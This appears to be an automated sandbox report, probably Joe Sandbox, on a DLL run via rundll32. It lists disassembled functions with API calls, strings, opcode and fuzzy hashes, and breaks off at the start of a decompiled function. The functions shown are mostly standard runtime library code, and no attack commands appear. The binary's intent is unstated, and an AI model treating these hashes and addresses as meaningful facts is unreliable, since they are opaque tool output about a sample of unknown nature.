_free.LIBCMT ref: 6E258B75

Part of subcall function 6E258951: _free.LIBCMT ref: 6E2589A9
Part of subcall function 6E258951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60

Strings

0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!'n
API String ID: 314583886-2553279824
Opcode ID: b7d4e11845e5b9df238169375f1e91c20712f1f28ba93683e3b589d43839a798
Instruction ID: 2d7148b183a6b827f0dbd635795aa4ac155bef34ca229043efccfa8fcf4cf7c1
Opcode Fuzzy Hash: b7d4e11845e5b9df238169375f1e91c20712f1f28ba93683e3b589d43839a798
Instruction Fuzzy Hash: DF217CB6C1421D9BDB2887A8CE44DDBB37FCB81720F1006A5D455E6340DBB04D90C5A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E

Strings

ios_base::failbit set, xrefs: 6E1E1F16
ios_base::eofbit set, xrefs: 6E1E1F1B
ios_base::badbit set, xrefs: 6E1E1F0C, 6E1E1F31

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
Instruction ID: 6898c8c95af63bb64c1bd810da426ff31557d66aa9f6f58dc9a9725a31fc5930
Opcode Fuzzy Hash: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
Instruction Fuzzy Hash: 02F0F4B2E446192FDF54DBD8C802FDA73A96B14314F208845F951AB582EB75A889C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E20407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E204084
_strlen.LIBCMT ref: 6E2040AF
_strlen.LIBCMT ref: 6E2040C6

Strings

[json.exception., xrefs: 6E20409F, 6E2040A7, 6E2040C5, 6E2040CD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
Instruction ID: ed24d3b07345910740ac1649ea3544e7153a155586584edc6b9706bbbf42f53f
Opcode Fuzzy Hash: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
Instruction Fuzzy Hash: 64F036B5600219AFDB189FB8C8506FEB6EFBF44708F540919E409DB281DBB45D548791

Uniqueness

Uniqueness Score: -1.00%

Function 6E24F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E24F3D0
__alldvrm.LIBCMT ref: 6E24F5D1
__alldvrm.LIBCMT ref: 6E24F5F3

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: 07e65a92fcb1d6d644c436182b844975bdb8764f7259a11deebbd27491fcd912
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: 3EA1557691428FDFF719CFA8C890BABBBE6EF85314F2442ADD5949B280C7348941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E256102, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E270EA8,00000000,00000000,008B018B,6E24DA1E,?,00000004,00000001,6E270EA8,0000007F,?,008B018B,00000001), ref: 6E25614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2561D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2561EA
__freea.LIBCMT ref: 6E2561F3

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: b30219ad50a569769e6aa6c4296d56bcfb8a360b3a09130c5d27d8dbb37aad88
Instruction ID: 24040bab084808e666568400936d7155eeaf8ac9e81db9348fa2041b39c9d7f1
Opcode Fuzzy Hash: b30219ad50a569769e6aa6c4296d56bcfb8a360b3a09130c5d27d8dbb37aad88
Instruction Fuzzy Hash: 6B31BF71A1021F9FDF148FA4CC84DBE7BA6EB40614F188568EC14DA351EB35C960CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E253E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue), ref: 6E253EB1
GetLastError.KERNEL32(?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000,00000364,?,6E24D6D1), ref: 6E253EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000), ref: 6E253ECB

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
Instruction ID: b608b0b885ca7fd519d03412d6d71d138d0ca4d3c501e79feaf1a421cc3c9c77
Opcode Fuzzy Hash: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
Instruction Fuzzy Hash: C601FC3236563B9BCB514BA98D4CD5777EBBF167A1B240624F905D3344DB21D821C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2114EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E2114F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211528

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E211539

Part of subcall function 6E210110: __EH_prolog3.LIBCMT ref: 6E210117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21154A

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 9f21a5334f134fa8ac04136cb2d03b3e3016223f0985435e4cef6b08bbba8732
Instruction ID: 2e32ef2f549774a53d890ce118931582242e0feea91c09fbe127c2a04df80d54
Opcode Fuzzy Hash: 9f21a5334f134fa8ac04136cb2d03b3e3016223f0985435e4cef6b08bbba8732
Instruction Fuzzy Hash: 8701D674A0021F9FD701CBE8C851BDE7BBAAF10744F100416E615BB240EB704B85C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E211558, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211594

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E2115A5

Part of subcall function 6E210143: __EH_prolog3.LIBCMT ref: 6E21014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E2115B6

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 81d7ba6be5f9af5f13f2690463f997f7be000ffd5904dfe1ebf73ba1a3d49f8b
Instruction ID: 8e155efdcd922922af3e2e2a8304fb80cc0c8c159035ca2b258a3c26daefa17d
Opcode Fuzzy Hash: 81d7ba6be5f9af5f13f2690463f997f7be000ffd5904dfe1ebf73ba1a3d49f8b
Instruction Fuzzy Hash: C501D1B4A0421FAFDB20CBE4C860BDEBBBAAF14744F100515EA15AB280CBB04B85C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E21C229, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21C230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E21C265

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E21C276

Part of subcall function 6E21BD9F: __EH_prolog3.LIBCMT ref: 6E21BDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21C287

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 5ab552f307b1fe4e39d11e60b28dc9d8cc65a90866879929da756d42ff2a1e22
Instruction ID: d7d19c46935fcf2b72b34e4d060d71294fd56aa4c7bf56b0b49adc697a4a4342
Opcode Fuzzy Hash: 5ab552f307b1fe4e39d11e60b28dc9d8cc65a90866879929da756d42ff2a1e22
Instruction Fuzzy Hash: B5016D79A0421EDBDB45DFE4C851ADEBBFAAF44B85F100525E614AB280CBB04B41C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E20B96F

Part of subcall function 6E20A2F1: __EH_prolog3.LIBCMT ref: 6E20A2F8
Part of subcall function 6E20A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
Part of subcall function 6E20A2F1: int.LIBCPMT ref: 6E20A319
Part of subcall function 6E20A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373

_Find_unchecked1.LIBCPMT ref: 6E20BB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E20B9D7

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
Instruction ID: 9058b79f0aed7c49f61ba439b98479c1ba6c938a87b63f456b38d7e56f044c7b
Opcode Fuzzy Hash: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
Instruction Fuzzy Hash: A6C19E34D1828E8FDF62CBE8C490BDCBBB7AF45304F1444A9D8966B2CECB649945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E2460ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E24617D

Strings

pow, xrefs: 6E246155, 6E246172

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
Instruction ID: c41f90c39b4b520227d771ef12d26310ff06030748f0458a2c9aae07ff911396
Opcode Fuzzy Hash: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
Instruction Fuzzy Hash: DE51ACE1AB810FD7DB456BE4CB9075A3BA7EB01B02F20CD5CD095823DDEB3184A4DA52

Uniqueness

Uniqueness Score: -1.00%

Function 6E25DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E25DE50,?,00000050,?,?,?,?,?), ref: 6E25DC8A

Strings

ACP, xrefs: 6E25DBCD
OCP, xrefs: 6E25DC03

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
Instruction ID: 765538ebe0c3eaa7bb62265b682247ad23f188a8fce3eedb0c41bb3cc0437e93
Opcode Fuzzy Hash: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
Instruction Fuzzy Hash: AE21C466A6410FA7E754CFD8CB00B8B73ABAB45B53F528424E90AD7308E772D961CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E21FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

`n,n, xrefs: 6E21FB65
Tn,n, xrefs: 6E21FB44

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Tn,n$`n,n
API String ID: 0-3894424707
Opcode ID: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
Instruction ID: 0fd38b8e3836c9714727457c7d25762572ff14ae64ee4c53b92351e2029f33ae
Opcode Fuzzy Hash: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
Instruction Fuzzy Hash: FD11B276C1461E9BEF80CEE8C454ADF77E79F0AB25F104166D921EB280D6B0C7018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E2059F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 6E205A52

Strings

[json.exception., xrefs: 6E2059FC
:B n, xrefs: 6E205A35

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID: :B n$[json.exception.
API String ID: 1075933841-3849622167
Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction ID: 218fd96fd83dae967e78c502c145d0d31e2c87026cedc3ff35e28bf0706639ee
Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction Fuzzy Hash: E50108765042195F8314CF58DCC0C4BB7DEEE892147100A6DF429C7341EB31E90587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E203751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E203758
__CxxThrowException@8.LIBVCRUNTIME ref: 6E2037E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E2037BA

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
Instruction ID: c772e41be5f7b2f332d735131a26b9f89d4a247c623edb0674636bff832eaf76
Opcode Fuzzy Hash: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
Instruction Fuzzy Hash: 9A0180B586860DAFD7129FE5C848FECB3FBBF26316F10891A9080960E0EB741685C752

Uniqueness

Uniqueness Score: -1.00%

Function 6E254B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,B0FC4CAD,B0FC4CAD,00000000,00000000,00000000,00000000,00000000), ref: 6E254C0F
GetLastError.KERNEL32 ref: 6E254C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E254C78

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
Instruction ID: 8775ab3d8009a28f0ed7ee8adb2f68d99103e5b50beb331d8458cda2a1d64c2a
Opcode Fuzzy Hash: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
Instruction Fuzzy Hash: 3E41F77560424FAFDB518FD5C944BAAB7BAAF81322F104159E857AB390DB318932CB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2736 Parent PID: 4244 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	373
Total number of Limit Nodes:	15

Executed Functions

Function 6E201285, Relevance: 44.3, APIs: 3, Strings: 22, Instructions: 597
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6E201285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
